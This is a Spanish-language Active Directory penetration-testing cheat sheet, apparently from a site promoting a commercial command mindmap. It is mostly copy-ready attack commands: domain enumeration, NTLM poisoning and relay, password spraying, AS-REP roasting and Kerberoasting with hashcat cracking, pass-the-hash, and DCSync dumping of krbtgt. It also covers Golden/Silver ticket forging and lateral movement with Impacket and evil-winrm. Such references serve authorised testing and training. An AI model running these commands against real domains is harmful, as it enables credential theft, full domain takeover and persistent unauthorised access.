# Enumeración del dominio
Mapea el dominio antes de atacar. NetExec (antes CrackMapExec) e Impacket son los caballos de batalla. Empieza sin autenticación y repite con cada credencial que consigas.
nxc smb 10.10.10.0/24enum4linux-ng -A DC_IPnxc smb DC_IP -u '' -p '' --usersldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountNamenxc smb DC_IP -u user -p pass --sharesnxc smb DC_IP -u user -p pass --pass-polGetADUsers.py -all domain/user:pass -dc-ip DC_IP# BloodHound — mapear rutas a DA
BloodHound grafica la ruta de ataque más corta a Domain Admin. Recopila los datos y deja que el grafo planifique tu cadena.
bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c allnxc ldap DC_IP -u user -p pass --bloodhound --collection-method all.\SharpHound.exe -c All# Envenenamiento LLMNR/NBT-NS & relay NTLM
Sin ninguna credencial, envenena la resolución de nombres para capturar hashes NetNTLM — luego crackéalos o reléalos.
responder -I eth0 -wvhashcat -m 5600 hashes.txt rockyou.txtntlmrelayx.py -tf targets.txt -smb2supportntlmrelayx.py -t ldap://DC_IP --escalate-user user# Password Spraying
Prueba una contraseña común contra todos los usuarios — mantente bajo el umbral de bloqueo obtenido de la política.
nxc smb DC_IP -u users.txt -p 'Temporada2026!' --continue-on-successkerbrute passwordspray -d domain.local users.txt 'Welcome1'nxc smb DC_IP -u users.txt -p passwords.txt --no-bruteforce--pass-pol primero. Bloquear cuentas es ruidoso y disruptivo — nunca rocíes a ciegas.# AS-REP Roasting
Las cuentas sin preautenticación Kerberos permiten solicitar un AS-REP y crackearlo offline — a veces sin ninguna credencial.
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IPGetNPUsers.py domain/user:pass -request -dc-ip DC_IPhashcat -m 18200 asrep.txt rockyou.txt# Kerberoasting
Cualquier usuario autenticado puede solicitar TGS para cuentas SPN. Las contraseñas de cuentas de servicio suelen ser débiles — crackéalas para escalar.
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -requestnxc ldap DC_IP -u user -p pass --kerberoasting kerb.txthashcat -m 13100 kerb.txt rockyou.txt# Pass-the-Hash
Autentícate con un hash NTLM en lugar de una contraseña — sin crackear. La columna vertebral del movimiento lateral en AD.
nxc smb OBJETIVO -u Administrator -H aad3b435b51404ee:HASHevil-winrm -i OBJETIVO -u Administrator -H HASHpsexec.py -hashes :HASH Administrator@OBJETIVOsecretsdump.py -hashes :HASH Administrator@OBJETIVO# DCSync
Con permisos de replicación, pide a un controlador de dominio el hash de cualquier cuenta — incluido krbtgt, la clave de los Golden Tickets.
secretsdump.py domain/user:pass@DC_IPsecretsdump.py domain/user:pass@DC_IP -just-dc-user krbtgtnxc smb DC_IP -u user -p pass --ntds# Golden & Silver Tickets
Forja tickets Kerberos para un control total y persistente. Golden = TGT forjado (hash krbtgt). Silver = TGS forjado para un servicio (hash de la cuenta de servicio).
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local Administratorexport KRB5CCNAME=Administrator.ccache; psexec.py -k -no-pass domain.local/Administrator@DCticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/server Administrator# Movimiento lateral & shells
Muévete entre hosts con las credenciales y tickets recopilados.
| Herramienta | Acceso | Notas |
|---|---|---|
| psexec.py | SYSTEM | Ruidoso, crea un servicio — el más detectado |
| wmiexec.py | Usuario | Semiinteractivo, sin servicio (más silencioso) |
| smbexec.py | SYSTEM | Ningún archivo escrito en disco |
| evil-winrm | Usuario | PowerShell completa — requiere WinRM (5985) |
| atexec.py | SYSTEM | Ejecuta vía tarea programada |
wmiexec.py domain/user:pass@OBJETIVOevil-winrm -i OBJETIVO -u user -p passnxc smb OBJETIVOS.txt -u user -p pass -x "whoami"❓ FAQ pentest Active Directory
La enumeración. Sin autenticación, ejecuta responder para capturar hashes y enum4linux-ng/nxc contra el dominio. En cuanto tengas credenciales, recopila la superficie con BloodHound.
Solicitar TGS para cuentas con SPN. El ticket se cifra con el hash de la cuenta de servicio, crackeado offline con hashcat -m 13100. Cualquier usuario del dominio puede pedirlos — ataque clásico de bajo a alto privilegio.
Kerberoasting apunta a cuentas SPN y crackea el TGS (-m 13100). AS-REP roasting apunta a cuentas sin preauth Kerberos y crackea el AS-REP (-m 18200) — posible sin credenciales si conoces un nombre válido.
Autenticarse con un hash NTLM en lugar de una contraseña en claro. Herramientas como nxc, evil-winrm e Impacket aceptan -H para usar el hash directamente — sin crackear.
Abusar de la replicación de directorio para pedir a un DC el hash de cualquier cuenta — incluidos krbtgt y los Domain Admins. Requiere permisos de replicación; secretsdump.py lo ejecuta remotamente.
Un TGT forjado firmado con el hash de krbtgt. Como krbtgt firma cada ticket, poseer su hash permite suplantar a cualquiera (incl. Domain Admin) indefinidamente — la persistencia definitiva. Consigue primero el hash de krbtgt vía DCSync.
Grafica las rutas más cortas a Domain Admin a partir de datos AD (usuarios, grupos, sesiones, ACL). Recopila con SharpHound o bloodhound-python, y ejecuta «Shortest Path to Domain Admins».
NetExec (antes CrackMapExec), Impacket (secretsdump, GetUserSPNs, psexec, ntlmrelayx), Responder, BloodHound, evil-winrm y hashcat. La mayoría vienen con Kali Linux.
📚 Recursos relacionados
- Cheatsheet Escalada de Privilegios Linux — 80+ técnicas para los hosts Linux que encontrarás en el dominio
- Cheatsheet Nmap — Encuentra primero el controlador de dominio y sus servicios 88/389/445
- Cheatsheet OSCP — El examen OSCP+ ahora incluye un conjunto completo de Active Directory
- Glosario de Pentesting — Kerberos, NTLM, SPN, TGT y 60+ términos clave definidos
Convierte tu compromiso de AD en un informe PDF profesional. La IA rellena CVE, CVSS y severidad.
¿Quieres los 12 020+ comandos?
Esta cheatsheet de AD es solo una rama del mapa. Pentest Mindmap organiza 12 020+ comandos en 34 categorías — de recon a post-explotación — con búsqueda instantánea y copia en un clic.
Empezar gratis →